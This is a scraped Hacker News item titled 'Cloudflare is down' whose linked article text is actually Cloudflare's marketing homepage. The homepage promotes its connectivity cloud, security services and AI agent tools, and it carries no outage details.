Cloudflare is down

Hacker News
www.cloudflare.com
2025-12-05 08:50:16
Comments...
Original Article

Our connectivity cloud is the best place to
  • connect your users, apps, clouds, and networks
  • protect everything you connect to the Internet
  • build and scale applications

Over 60 cloud services on one unified platform, uniquely powered by a global cloud network. We call it the connectivity cloud.

Connect your people, apps and AI agents

Modernize your network and secure your workspace against unauthorized access, web browsing attacks and phishing. Accelerate your journey to Zero Trust with our SASE platform today.

Speak to sales about SASE to modernize your network and secure your workspace.

No options

Select your job level... *

No options

Select your job function... *

No options

Bolivia, Plurinational State of

Bonaire, Sint Eustatius and Saba

British Indian Ocean Territory

Congo, the Democratic Republic of the

Falkland Islands (Malvinas)

French Southern Territories

Heard Island and McDonald Islands

Holy See (Vatican City State)

Lao People's Democratic Republic

Macedonia, the former Yugoslav Republic of

Saint Helena, Ascension and Tristan da Cunha

Saint Martin (French part)

Saint Pierre and Miquelon

Saint Vincent and the Grenadines

Sint Maarten (Dutch part)

South Georgia and the South Sandwich Islands

Tanzania, United Republic of

Venezuela, Bolivarian Republic of

Learn more

Related

Protect and accelerate websites and AI-enabled apps

Use our industry-leading WAF, DDoS, and bot protection to protect your websites, apps, APIs, and AI workloads while accelerating performance with our ultra-fast CDN. Get started in 5 minutes.

Related

Build and secure AI agents

Agents are the future of AI, and Cloudflare is the best place to get started. Use our agents framework and orchestration tools to run the models you choose and deliver new agents quickly. Build, deploy, and secure access for remote MCP servers so agents can access the features of your apps.

Related

One global cloud network unlike any other

Only Cloudflare offers an intelligent, global cloud network built from the ground up for security, speed, and reliability.

60+

cloud services available globally

234B

cyber threats blocked each day

20%

of all websites are protected by Cloudflare

330+

cities in 125+ countries, including mainland China

Cloudflare Stats

Leading companies rely on Cloudflare

Connect

Protect

Build

How Cloudflare can help

Performance acceleration bolt

Accelerate website performance

Security shield protection

Block bot traffic

Block bot traffic

Stop bot attacks in real time by harnessing data from millions of websites protected by Cloudflare.

Optimize Video Experience

Optimize video experiences

Deploy Severless Code Icon

Deploy serverless code

Deploy serverless code

Build serverless applications and deploy instantly across the globe for speed, reliability, and scale.

Deploy AI on the Edge Icon

Deploy AI on the edge

Eliminate Egress Fee for Object Storage

Eliminate egress fee for object storage

News and resources

What's new

Insights

Library

Events

Get started with the connectivity cloud

Security Shield Protection Icon

Get started for free

Get easy, instant access to Cloudflare security and performance services.

Start for free
Constellation Icon

Need help choosing?

Get a personalized product recommendation for your specific needs.

Find the right plan
Innovation Thinking Icon

Talk to an expert

Have questions or want to get a demo? Get in touch with one of our experts.

Contact us